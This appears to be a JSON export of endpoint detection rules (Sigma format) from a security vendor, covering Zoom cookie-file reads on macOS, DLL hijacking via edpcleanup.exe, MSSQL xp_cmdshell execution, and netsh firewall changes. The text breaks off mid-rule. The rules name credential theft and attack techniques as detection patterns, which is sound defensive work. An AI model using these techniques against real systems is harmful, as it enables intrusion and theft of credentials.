"https://attack.mitre.org/techniques/T1539/"
],
"name": "t1552_004_read_zoom_sensitive_files_macos.yml",
"content": "title: Suspicious Access to Zoom Sensitive Files\nid: 489d592b-0a46-401a-8296-cb95d0abe49a\ndescription: |\n Detects a suspicious access to Zoom files that hold cookies or sensitive files.\n Adversaries may steal Zoom application cookies and use them to gain access to the application without needing credentials.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1539/\ndate: 2024/06/18\nmodified: 2025/10/27\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1539\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.SensitiveInformation\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Kind: 'read'\n Path: '/Users/*/Library/Application Support/zoom.us/data/zoomus.enc.db'\n ProcessImage|contains: '?'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n 
Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n exclusion_virusscanner:\n Image: 
'/Applications/VirusScannerPlus.app/Contents/MacOS/VirusScannerPlus'\n\n ### backup sofware ###\n exclusion_backup:\n Image:\n - '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n - '/Library/Oxibox/oxibackupd'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_birdagent:\n ProcessImage|endswith: '/bird_agent_stable'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: '_bird_python_dbg'\n\n exclusion_paloalto:\n Image: '/library/application support/paloaltonetworks/traps/bin/pmd'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'pmd'\n\n exclusion_cleanmymac:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.macpaw.CleanMyMac*'\n\n exclusion_bitdefender:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.bitdefender.bddaemon'\n\n exclusion_image:\n ProcessImage:\n - '/sbin/md5'\n - '/usr/bin/rsync'\n - '/opt/homebrew/Cellar/rsync/*/bin/rsync'\n - '/Users/*/Applications/*/ripgrep/bin/rg'\n - '/usr/local/Cellar/ripgrep/*/bin/rg'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "489d592b-0a46-401a-8296-cb95d0abe49a",
"rule_name": "Suspicious Access to Zoom Sensitive Files",
"rule_description": "Detects suspicious access to Zoom files that hold cookies or other sensitive data.\nAdversaries may steal Zoom application cookies and use them to gain access to the application without needing credentials.\nIt is recommended to verify whether the process performing the read operation has a legitimate reason to do so.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-10-27",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1539"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "48a46575-c7c2-4961-a19b-0ccec37622d8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097023Z",
"creation_date": "2026-03-23T11:45:34.097025Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097030Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_edpcleanup.yml",
"content": "title: DLL Hijacking via edpcleanup.exe\nid: 48a46575-c7c2-4961-a19b-0ccec37622d8\ndescription: |\n Detects potential Windows DLL Hijacking via edpcleanup.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'edpcleanup.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DMCmnUtils.dll'\n - '\\DNSAPI.dll'\n - '\\FirewallAPI.dll'\n - '\\fwbase.dll'\n - '\\netutils.dll'\n - '\\policymanager.dll'\n - '\\profapi.dll'\n - '\\SspiCli.dll'\n - '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of 
filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "48a46575-c7c2-4961-a19b-0ccec37622d8",
"rule_name": "DLL Hijacking via edpcleanup.exe",
"rule_description": "Detects potential Windows DLL Hijacking via edpcleanup.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "48a4e8ec-4a97-4420-8fd1-9ce20191c569",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627719Z",
"creation_date": "2026-03-23T11:45:34.627721Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627726Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql",
"https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
"https://attack.mitre.org/techniques/T1190/",
"https://attack.mitre.org/techniques/T1133/",
"https://attack.mitre.org/techniques/T1059/"
],
"name": "t1190_mssql_xp_cmdshell.yml",
"content": "title: Suspicious Execution via MSSQL Stored Procedure\nid: 48a4e8ec-4a97-4420-8fd1-9ce20191c569\ndescription: |\n Detects a suspicious command execution via MSSQL xp_cmdshell extended stored procedure.\n Attackers can use this stored procedure to execute any Windows command shell on the host with the same permissions of the Microsoft SQL Server instance.\n It is recommended to check other command executed by MSSQL and identify the source of the connection using authentication events.\nreferences:\n - https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql\n - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\n - https://attack.mitre.org/techniques/T1190/\n - https://attack.mitre.org/techniques/T1133/\n - https://attack.mitre.org/techniques/T1059/\ndate: 2022/07/15\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - attack.t1133\n - attack.execution\n - attack.t1059\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Exploitation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\cmd.exe'\n CommandLine|contains: '\\cmd.exe /c '\n ParentImage|endswith: '\\sqlservr.exe'\n\n exclusion_commandline:\n CommandLine:\n - '?:\\Windows\\system32\\cmd.exe /c ipconfig /all'\n - '?:\\Windows\\system32\\cmd.exe /c rename *'\n - '?:\\Windows\\system32\\cmd.exe /c DEL *'\n - '?:\\Windows\\system32\\cmd.exe /c RMDIR *'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Program Files\\Microsoft SQL Server\\\\*\\Tools\\Binn\\sqllogship.exe *'\n - '?:\\Windows\\system32\\cmd.exe /c D:\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c E:\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c if exist \\\\* rmdir *'\n - '?:\\Windows\\system32\\cmd.exe /c MKDIR ?:\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c md ?:\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c if not exist *'\n - 
'?:\\Windows\\system32\\cmd.exe /c IF EXIST *'\n - '?:\\Windows\\system32\\cmd.exe /c copy *'\n - '?:\\Windows\\system32\\cmd.exe /c xcopy *'\n - '?:\\Windows\\system32\\cmd.exe /c MOVE/Y *'\n - '?:\\Windows\\system32\\cmd.exe /c XCOPY ?:\\Program Files\\Microsoft SQL Server\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c robocopy ?:\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c BCP *'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Inetpub\\wwwroot\\iVue\\iVue_JobAgentStart.vbs'\n - '?:\\Windows\\system32\\cmd.exe /c powershell.exe -c Get-WmiObject -ComputerName * -Class Win32_Volume -Filter ?DriveType = 3? *'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe $serviceName = * ; $result = Get-service*| where {($_.name -eq $serviceName -and $_.status -eq ?running?) }*'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe $hostname=hostname;Get-winEvent -filterHashTable @{logname =*Microsoft-Windows-FailoverClustering/Operational*; id=1201}*'\n - '?:\\Windows\\system32\\cmd.exe /c powershell.exe $* = systeminfo /s %computername% | findstr /i /c:?Model:? /c:?System Boot Time? 
/c:?Host Name?;foreach ($* in $*) { if ($* -like ?*Host Name*?)'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Get-winEvent *'\n - '?:\\Windows\\system32\\cmd.exe /c net use'\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\Inetpub\\wwwroot\\iVue\\iVue_LineToUTF-8_file.vbs /ReportId:*'\n - '?:\\WINDOWS\\system32\\cmd.exe /c cscript.exe //nologo ?:\\inetpub\\wwwroot\\iVue\\iVue_LineToUTF-8_file.vbs /ReportId:*'\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\Inetpub\\wwwroot\\iVue\\iVue_startBatchPrint.vbs /RunId:*'\n - '?:\\WINDOWS\\system32\\cmd.exe /c cscript.exe //nologo ?:\\inetpub\\wwwroot\\iVue\\iVue_startBatchPrint.vbs /RunId:*'\n - '?:\\Windows\\system32\\cmd.exe /c cscript.exe //nologo ?:\\inetpub\\wwwroot\\ivue\\iVue_JobAgentStart.vbs'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe [System.TimeZoneInfo]::Local.GetUtcOffset((Get-Date)).TotalMinutes'\n - '?:\\Windows\\system32\\cmd.exe /c CScript ?:\\Tools\\ICCA_UpdatePtChartAccess.vbs *'\n - '?:\\Windows\\system32\\cmd.exe /c sqlcmd -E -S * -d RSAdmin -Q EXECUTE [dbo].*'\n - '?:\\Windows\\system32\\cmd.exe /c sqlcmd -E -S * -d msdb -Q DECLARE @CleanupDate datetime SET*'\n - '?:\\Windows\\system32\\cmd.exe /c net use ?: /delete'\n - '?:\\Windows\\system32\\cmd.exe /c sqlcmd -S . 
-d * -E -s; -W -q EXEC [dbo].[getExtract_*]*'\n - '?:\\windows\\system32\\cmd.exe /c sqlcmd *-i?:\\\\*.sql'\n - '?:\\Windows\\system32\\cmd.exe /c wmic volume where Drivetype=3 get caption, freespace, capacity, label'\n - '?:\\Windows\\system32\\cmd.exe /c wmic /FailFast:ON logicaldisk where (Drivetype =3 and volumename!=RECOVERY AND volumename!=System Reserved) get deviceid,volumename /Format:csv'\n - '?:\\WINDOWS\\system32\\cmd.exe /c set temp'\n - '?:\\Windows\\system32\\cmd.exe /c ftp -i -s*'\n - '?:\\Windows\\system32\\cmd.exe /c echo *'\n - '?:\\windows\\system32\\cmd.exe /c MOVE *'\n - '?:\\Windows\\system32\\cmd.exe /c cmd /c *\\_PRT\\Datacard\\Print.BSG.cmd'\n - '?:\\Windows\\system32\\cmd.exe /c dtexec *'\n - '?:\\Windows\\system32\\cmd.exe /c osql *'\n - '?:\\Windows\\system32\\cmd.exe /c WMIC PROCESS WHERE Name=Socle.Exploitation.Agent.exe GET NAME, CREATIONDATE, PROCESSID /FORMAT:csv'\n - '?:\\Windows\\system32\\cmd.exe /c fsutil *'\n - '?:\\windows\\system32\\cmd.exe /c *powershell.exe *\\AuditDBA\\\\*_audit_*'\n - '?:\\Windows\\system32\\cmd.exe /c WMIC SERVICE WHERE *'\n - '?:\\Windows\\system32\\cmd.exe /c python *\\NextGenCompileResolve\\CRW.pyc*'\n # dir\n - '?:\\Windows\\system32\\cmd.exe /c dir D:\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c dir E:\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c dir F:\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c dir G:\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c dir \\\\\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c DIR ?:\\Program Files\\Microsoft SQL Server\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c dir /b *'\n - '?:\\Windows\\system32\\cmd.exe /c dir /-C *'\n - '?:\\Windows\\system32\\cmd.exe /c dir /4 /-C /TW *'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "48a4e8ec-4a97-4420-8fd1-9ce20191c569",
"rule_name": "Suspicious Execution via MSSQL Stored Procedure",
"rule_description": "Detects a suspicious command execution via the MSSQL xp_cmdshell extended stored procedure.\nAttackers can use this stored procedure to execute any Windows command shell on the host with the same permissions as the Microsoft SQL Server instance.\nIt is recommended to check other commands executed by MSSQL and to identify the source of the connection using authentication events.\n",
"rule_creation_date": "2022-07-15",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1059",
"attack.t1133",
"attack.t1190"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "48c6cf63-7480-4181-ad6b-865dbb4d413c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070239Z",
"creation_date": "2026-03-23T11:45:34.070241Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070246Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/fr-fr/windows-server/networking/technologies/netsh/netsh-contexts",
"https://attack.mitre.org/techniques/T1562/004/",
"https://attack.mitre.org/techniques/T1090/",
"https://attack.mitre.org/software/S0108/"
],
"name": "t1562_004_netsh_firewall_add_rule.yml",
"content": "title: New Rule added to the Windows Firewall Policy via Netsh\nid: 48c6cf63-7480-4181-ad6b-865dbb4d413c\ndescription: |\n Detects a new rule added to the Windows firewall's policy using Netsh.\n Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage.\n Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules.\n It is recommended to investigate the added firewall rule, as well as the execution context and surrounding detections to determine if this action was legitimate.\nreferences:\n - https://docs.microsoft.com/fr-fr/windows-server/networking/technologies/netsh/netsh-contexts\n - https://attack.mitre.org/techniques/T1562/004/\n - https://attack.mitre.org/techniques/T1090/\n - https://attack.mitre.org/software/S0108/\ndate: 2021/05/06\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.004\n - attack.t1090\n - attack.s0108\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\netsh.exe'\n - OriginalFileName: 'netsh.exe'\n selection_cmd:\n CommandLine|contains|all:\n - ' advfirewall '\n - ' add '\n - ' rule '\n - ' name='\n - ' action='\n\n exclusion_command:\n CommandLine|contains:\n - 'name=?FusionInventory-Agent'\n - 'name=FusionInventory-Agent'\n - 'name=Dropbox'\n # PRTG_Network_Monitor / PRTG_Network_Monitor_Admin_Tool / PRTG_Network_Monitor_Application_Server / PRTG_Network_Monitor_Server / PRTG_Network_Monitor_Probe\n - 'name=?PRTG_Network_Monitor'\n - 'name=PRTG_Network_Monitor'\n - 'name=?Intel(R) System Usage Report -'\n - 'name=?BlueStacks Service Hyper-V'\n - 'name=?BlueStacks Service'\n - 'name=PRTG_Network_Monitor_Admin_Tool '\n - 
'name=PRTG_Network_Monitor_Probe '\n - 'name=PRTG_Network_Monitor_Application_Server '\n - 'name=PRTG_Network_Monitor_Server '\n - 'name=One Dragon Center Bridge '\n - 'name=RecoveritUDPAccessInboundRule '\n - 'name=RecoveritTCPAccessInboundRule '\n - 'name=Sentinel RMS License Manager '\n # C:\\WINDOWS\\system32\\netsh.exe advfirewall firewall add rule name=starleaf S-1-5-21-3198272496-3173654091-250741777-1010 program=C:\\Users\\xxxxx\\AppData\\Local\\starleaf\\starleaf\\2\\starleafc.exe protocol=ANY dir=in action=allow\n - 'name=starleaf S-1-5-21-'\n - 'name=RecoveritRSUDPAccessInboundRule'\n - 'name=RecoveritRSTCPAccessInboundRule'\n - 'name=FusionInventory-Agent program=?:\\Program Files\\FusionInventory-Agent\\perl\\bin\\perl.exe'\n - 'name=FusionInventory-Agent program=?:\\Program Files\\FusionInventory-Agent\\perl\\bin\\fusioninventory-agent.exe'\n - 'name=MSExchangeIS dir=in action=allow program=?:\\Program Files\\Microsoft\\Exchange Server\\V1?\\bin\\Microsoft.Exchange.Worker.exe'\n - 'name=MSExchangeIS dir=in action=allow program=?:\\Program Files\\Microsoft\\Exchange Server\\V1?\\bin\\Microsoft.Exchange.Store.Service.exe'\n - 'name=ActivePresenter License Activator program=?:\\Program Files (x86)\\ATOMI\\ActivePresenter\\rlactivator.exe dir='\n - 'name=ActivePresenter program=?:\\Program Files (x86)\\ATOMI\\ActivePresenter\\ActivePresenter.exe dir='\n - 'name=Wildix Integration Service dir=in action=allow program=?:\\Program Files\\Wildix\\WIService\\wiservice.exe'\n - 'name= program=?:\\Program Files\\GLPI-Agent\\perl\\bin\\glpi-agent.exe description= outgoing traffic dir=out action=allow'\n - 'name= program=?:\\Program Files\\GLPI-Agent\\perl\\bin\\glpi-agent.exe description= embedded HTTP server incoming traffic protocol=TCP dir=in localport='\n - 'name=glpi agent program=?:\\program files\\glpi-agent\\perl\\bin\\glpi-agent.exe description=glpi agent outgoing traffic dir=out action=allow'\n - 'name=glpi agent program=?:\\program 
files\\glpi-agent\\perl\\bin\\glpi-agent.exe description=glpi agent embedded http server incoming traffic protocol=tcp dir=in localport=* action=allow'\n - 'name=GLPI Agent program= description=GLPI Agent embedded HTTP server incoming traffic protocol=TCP dir=in localport=* action=allow'\n - 'name=devolo Cockpit program=?:\\Program Files (x86)\\devolo\\dlan\\devolonetsvc.exe dir=in action=allow profile=any localport='\n - 'name=devolo Cockpit program=?:\\Program Files\\devolo\\dlan\\devolonetsvc.exe dir=in action=allow profile=any localport='\n - 'name=SWVisualize????.Queue.Server protocol=TCP dir=in localport=???? action=allow' # SOLIDWORKS Corp\n - '?:\\WINDOWS\\SysWOW64\\netsh.exe advfirewall firewall add rule name=MSMPI-SMPD dir=in action=allow program=?:\\Program Files\\Microsoft MPI\\Bin\\smpd.exe'\n - '?:\\WINDOWS\\SysWOW64\\netsh.exe advfirewall firewall add rule name=MSMPI-SMPD dir=out action=allow program=?:\\Program Files\\Microsoft MPI\\Bin\\smpd.exe'\n - '?:\\WINDOWS\\SysWOW64\\netsh.exe advfirewall firewall add rule name=MSMPI-LaunchSvc dir=in action=allow program=?:\\Program Files\\Microsoft MPI\\Bin\\msmpilaunchsvc.exe'\n - '?:\\WINDOWS\\SysWOW64\\netsh.exe advfirewall firewall add rule name=MSMPI-LaunchSvc dir=out action=allow program=?:\\Program Files\\Microsoft MPI\\Bin\\msmpilaunchsvc.exe'\n - '?:\\WINDOWS\\SysWOW64\\netsh.exe advfirewall firewall add rule name=MSMPI-MPIEXEC dir=in action=allow program=?:\\Program Files\\Microsoft MPI\\Bin\\mpiexec.exe profile=any'\n - '?:\\WINDOWS\\SysWOW64\\netsh.exe advfirewall firewall add rule name=MSMPI-MPIEXEC dir=out action=allow program=?:\\Program Files\\Microsoft MPI\\Bin\\mpiexec.exe profile=any'\n - '?:\\windows\\system32\\netsh.exe advfirewall firewall add rule name=msi center - syncserver dir=in protocol=tcp localport=33683 action=allow'\n - '?:\\windows\\system32\\netsh.exe advfirewall firewall add rule name=xddclient dir=in action=allow program=?:\\program files (x86)\\ivanti\\epm agent\\base 
engine\\xddclient.exe enable=yes profile=domain'\n - '?:\\windows\\system32\\netsh advfirewall firewall add rule name=taniumclient.exe dir=in action=allow protocol=tcp localport=17472 enable=yes profile=any program=?:\\program files (x86)\\tanium\\tanium client\\taniumclient.exe'\n\n exclusion_programfiles:\n ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_fiery:\n GrandparentImage: '?:\\Program Files (x86)\\FPDU\\Fiery Driver Updater.exe'\n\n exclusion_davincy:\n # C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\ProgramData\\Blackmagic Design\\DaVinci Resolve\\Support\\setupfirewall.bat\" \"C:\\Program Files\\Blackmagic Design\\DaVinci Resolve\\\"\"\n ParentCommandLine|contains: ':\\ProgramData\\Blackmagic Design\\DaVinci Resolve\\Support\\setupfirewall.bat'\n\n exclusion_sara:\n ParentImage: '*\\Microsoft.Sara.exe'\n CommandLine|contains|all:\n - 'MicrosoftSaraFiddler'\n - 'Microsoft.Sara.exe'\n\n exclusion_exchange:\n CommandLine|contains|all:\n - 'name=\"MSExchangeIS\"'\n - 'program=\"?:\\Program Files\\Microsoft\\Exchange Server\\V1?\\bin\\'\n\n exclusion_exchange_2:\n # C:\\Windows\\system32\\netsh.exe advfirewall firewall add rule name=MSExchangeIS dir=in action=allow program=D:\\Exchange\\bin\\Microsoft.Exchange.Store.Service.exe localip=any remoteip=any profile=any Enable=yes\n CommandLine|contains|all:\n - 'name=MSExchangeIS'\n - ' dir=in action=allow '\n - 'bin\\Microsoft.Exchange.Store.Service.exe'\n\n exclusion_ahnlab:\n ParentImage: '?:\\Program Files\\AhnLab\\Safe Transaction\\StSess.exe'\n GrandparentImage: '?:\\Program Files\\AhnLab\\Safe Transaction\\ASDSvc.exe'\n\n exclusion_astrill:\n # ?:\\windows\\system32\\netsh.exe advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name=Astrill VPN Client program=C:\\Program Files (x86)\\Astrill\\astrill.exe\n CommandLine|contains: 'name=Astrill VPN Client program=?:\\Program Files (x86)\\Astrill\\astrill.exe'\n\n 
